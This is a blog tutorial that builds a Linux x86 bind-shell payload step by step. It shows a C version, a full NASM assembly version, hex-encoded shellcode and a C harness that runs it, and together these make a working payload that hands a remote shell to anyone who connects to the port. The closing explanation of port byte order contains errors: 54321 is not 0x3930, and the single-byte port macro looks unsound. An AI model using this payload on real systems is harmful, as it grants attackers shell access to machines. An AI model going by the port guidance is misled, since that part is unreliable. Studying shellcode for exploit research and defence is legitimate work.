Goal
The goal of this ticket is to write a shellcode that will open a socket on a specific port and executes a shell when someone connects to the specific port.
In order to complete this task I will try to follow the workflow that I presented in my previous tickets concerning shellcode writing (Introduction to Linux shellcode writing, part 1 and part 2) meaning that i will first write a C version, then I will try to translate the C version in assembler trying to avoid the common shellcode writing pitfalls like null bytes problem and the addressing problem.
1. The C version of the shellcode
The following listing represents a minimal version (no error checking is done) of a port-binding program. Basically the program is doing the following actions:
- create a socket
- binds the socket to an address and port
- listen for the clients
- accept a client connection
- redirect the stdin, stdout and stderr to the new socket open by the client
- execute “bin/sh”
- close the sockets
#include <stdio.h>
#include <stdlib.h>
#include <netdb.h>
#include <netinet/in.h>
#include <string.h>
int main( int argc, char *argv[] ) {
int serverSocketFileDescriptor;
int clientSocketFileDescriptor;
int clilen;
struct sockaddr_in serv_addr;
struct sockaddr_in cli_addr;
/* First call to socket() function */
serverSocketFileDescriptor = socket(AF_INET, SOCK_STREAM, 0);
/* Initialize socket structure */
bzero((char *) &serv_addr, sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_addr.s_addr = INADDR_ANY;
serv_addr.sin_port = htons(65535);
/* Now bind the host address using bind() call.*/
bind(serverSocketFileDescriptor, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
/*
Now start listening for the clients, here the process will
* go in sleep mode and will wait for the incoming connection
*/
listen(serverSocketFileDescriptor,1);
clilen = sizeof(cli_addr);
/* Accept actual connection from the client */
clientSocketFileDescriptor = accept(serverSocketFileDescriptor, (struct sockaddr *)&cli_addr, &clilen);
/*Redirect to the new socket the sdtin,stdout,stderr*/
dup2(clientSocketFileDescriptor, 0);
dup2(clientSocketFileDescriptor, 1);
dup2(clientSocketFileDescriptor, 2);
/*execute /bin/sh */
execve("/bin/sh", NULL, NULL);
/* Close the sockets*/
close(clientSocketFileDescriptor);
close(serverSocketFileDescriptor);
}
2. The assembler version of the shellcode
2.1 Find the system call numbers of the functions used in the C version
The first step in order to write the assembler version is to find the system calls number for each of the calls used in the C version.
For all the socket operations there is only one system call, the number 102:
cat /usr/include/i386-linux-gnu/asm/unistd_32.h | grep socket
#define __NR_socketcall 102
The sub calls numbers can be found in the file /usr/include/linux/net.h :
#define SYS_SOCKET 1 /* sys_socket(2) */
#define SYS_BIND 2 /* sys_bind(2) */
#define SYS_CONNECT 3 /* sys_connect(2) */
#define SYS_LISTEN 4 /* sys_listen(2) */
#define SYS_ACCEPT 5 /* sys_accept(2) */
For all the others calls (dup2, execve and close) the system call numbers are:
#define __NR_dup2 63
#define __NR_execve 11
#define __NR_close 6
The second step is to take a look to the man pages of each of the functions used to check the needed parameters for each of the functions.
2.2 Implement the assembler version for each of the functions from the C program
Once we have all the necessary informations for the functions used in the C version (the system call numbers and the parameters) the next step is to write the assembler version of the C program.
For the assembler implementation I decided to encapsulate each of the system calls in different functions for (code) clarity reasons even if the shellcode would be bigger. Initially my plan was to have something like this in the _start section of the program:
_start:
call OpenSocket
call BindSocket
call ListenSocket
call AcceptSocket
call Dup2OutInErr
call ExecuteBinSh
Unfortunately, even if the original implementation worked flawlessly, the embarked shellcode didn’t worked and I was not able to find the root cause. So, the working implementation is still contains different assembler functions for each C function but each function calls the following one:
_start:
call OpenSocket
...
call BindSocket
...
call ListenSocket
...
call AcceptSocket
...
call Dup2OutInErr
...
call ExecuteBinSh
...
ret
ret
ret
ret
ret
ret
The assembler implementation of the port-biding shellcode is the following one:
; Filename: SocketServer.nasm
; Author: [email protected]
; Website: itblog.adrian.citu.name
global _start
section .text
OpenSocket:
;syscall socketcall
xor eax,eax
xor ebx, ebx
mov al, 102
; build the argument array on the stack
push ebx ;protocol = 0
push 1 ; type = SOCK_STREAM (1)
push 2 ;domain = PF_INET (2)
mov ecx, esp ;pointer to argument array
mov bl, 01 ;1 = SYS_SOCKET = socket()
int 0x80
mov esi, eax
call BindSocket
ret
BindSocket:
; syscall socketcall
xor eax, eax
xor ebx, ebx
mov al, 102
;build sockaddr struct on the stack
push ebx ; INADDR_ANY = 0
push word 0xffff ; PORT = 65535
push word 2 ; AF_INET = 2
mov ecx, esp ; pointer to sockaddr struct
mov bl, 2 ;2 = SYS_BIND = bind()
push BYTE 16 ;sizeof(sockaddr struct) = 16 taken from the
;systrace SocketServerCpp version
push ecx ;sockaddr struct pointer
push esi ;socket file descriptor
mov ecx, esp ;pointer to argument array
int 0x80
call ListenSocket
ret
ListenSocket:
;syscall socketcall
xor eax, eax
xor ebx, ebx
mov al, 102
mov bl, 4 ;4 = SYS_LISTEN = listen()
; build the Listen() arguments on the stack
push 1
push esi ; socket file descriptor
mov ecx, esp ; pointer to argument array
int 0x80 ; kernel interrupt
call AcceptSocket
ret
AcceptSocket:
xor eax, eax
xor ebx, ebx
xor edx, edx
mov al, 102 ;syscall socketcall
mov bl, 5 ;5 = SYS_ACCEPT = accept()
; build the accept() arguments on the stack
push edx ;socklen = 0
push edx ;sockaddr pointer = 0
push esi ;socket file descriptor
mov ecx, esp ;pointer to argument array
int 0x80
mov esi, eax ;store the new file descriptor
call Dup2OutInErr
ret
Dup2OutInErr:
xor eax, eax
xor ebx, ebx
;syscall dup2
mov al, 63
mov ebx, esi
xor ecx, ecx ;duplicate stdin
int 0x80
xor eax, eax
xor ebx, ebx
mov al, 63 ;syscall dup2
mov ebx, esi
inc ecx ;duplicate stdout, ebx still holds the socket fd
int 0x80
xor eax, eax
xor ebx, ebx
mov al, 63 ;syscall dup2
mov ebx, esi
inc ecx
inc ecx ;duplicate stdout, ebx still holds the socket fd
int 0x80
call ExecuteBinSh
ret
ExecuteBinSh:
xor eax, eax
xor ebx, ebx
xor ecx, ecx
push eax ;null bytes
push 0x68732f2f ;//sh
push 0x6e69622f ;/bin
mov ebx, esp ;load address of /bin/sh
push eax ;set argument to 0x0
mov ecx, esp ;save the pointer to argument envp
push eax ;set argument to 0x0
mov edx, esp ;save the pointer to argument ptr
mov al, 11 ;syscall execve
int 0x80
ret
_start:
call OpenSocket
3. Test the shellcode
To test the shelcode we will follow the procedure described in Introduction to Linux shellcode writing – Test your shellcode but basically we retrieve the HEX version of the shellcode (using the commandlinefu.com command) from the binary and then we added to shellcode.c program.
The HEX version of the shellcode is the following one:
"\x31\xc0\x31\xdb\xb0\x66\x53\x6a\x01\x6a\x02\x89\xe1\xb3\x01\xcd\x80\x89\xc6\xe8\x01
\x00\x00\x00\xc3\x31\xc0\x31\xdb\xb0\x66\x53\x66\x6a\xff\x66\x6a\x02\x89\xe1\xb3\x02
\x6a\x10\x51\x56\x89\xe1\xcd\x80\xe8\x01\x00\x00\x00\xc3\x31\xc0\x31\xdb\xb0\x66\xb3
\x04\x6a\x01\x56\x89\xe1\xcd\x80\xe8\x01\x00\x00\x00\xc3\x31\xc0\x31\xdb
\x31\xd2\xb0\x66\xb3\x05\x52\x52\x56\x89\xe1\xcd\x80\x89\xc6\xe8\x01\x00\x00\x00\xc3
\x31\xc0\x31\xdb\xb0\x3f\x89\xf3\x31\xc9\xcd\x80\x31\xc0\x31\xdb\xb0\x3f\x89\xf3\x41
\xcd\x80\x31\xc0\x31\xdb\xb0\x3f\x89\xf3\x41\x41\xcd\x80\xe8\x01\x00\x00\x00\xc3\x31
\xc0\x31\xdb\x31\xc9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe1
\x50\x89\xe2\xb0\x0b\xcd\x80\xc3\xe8\x4e\xff\xff\xff"
3.1 Make the port number as a parameter
In the actual code the port number is static (it’s the same for every execution, 0xffff). We would like to make it as a parameter. First we must find the HEX value of the instruction representing the port number. Using the objdump with the following parameters:
objdump -d SocketServer -M intel | grep ffff
and we will find:
8048080: 66 6a ff pushw 0xffff
So, in our binary representation of the shellcode we could make a constant reprenting the port number something like:
#include<stdio.h>
#include<string.h>
#define PORT_NUMBER "\xff" // 0xffff
unsigned char code[] = \
"\x31\xc0\x31\xdb\xb0\x66\x53\x6a\x01\x6a\x02\x89\xe1\xb3\x01\xcd\x80\x89"
"\xc6\xe8\x01\x00\x00\x00\xc3\x31\xc0\x31\xdb\xb0\x66\x53\x66\x6a"
PORT_NUMBER
"\x66\x6a\x02\x89\xe1\xb3\x02\x6a\x10\x51\x56\x89\xe1\xcd\x80\xe8\x01"
"\x00\x00\x00\xc3\x31\xc0\x31\xdb\xb0\x66\xb3\x04\x6a\x01\x56\x89\xe1\xcd\x80"
"\xe8\x01\x00\x00\x00\xc3\x31\xc0\x31\xdb\x31\xd2\xb0\x66\xb3\x05\x52\x52\x56"
"\x89\xe1\xcd\x80\x89\xc6\xe8\x01\x00\x00\x00\xc3\x31\xc0\x31\xdb"
"\xb0\x3f\x89\xf3\x31\xc9\xcd\x80\x31\xc0\x31\xdb\xb0\x3f\x89\xf3\x41"
"\xcd\x80\x31\xc0\x31\xdb\xb0\x3f\x89\xf3\x41\x41\xcd\x80\xe8\x01\x00"
"\x00\x00\xc3\x31\xc0\x31\xdb\x31\xc9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
"\x6e\x89\xe3\x50\x89\xe1\x50\x89\xe2\xb0\x0b\xcd\x80\xc3\xe8\x4e\xff\xff\xff";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
Last point about the port number; the port number is pushed on the stack in HEX version and due to the Little Endian architecture of the Intel processors the port number should be pushed in reverse order. For example if you want to push decimal 12345 (0x3039), you should push 54321 (0x3930). You can use this small sh script to compute the port number in “good” order: https://github.com/AdrianCitu/slae/blob/master/slae1/portCalc.sh
All the source codes explained presented in this ticket can be found here: gitHub.
Bibliography
Adventures in the programming jungle 
You must be logged in to post a comment.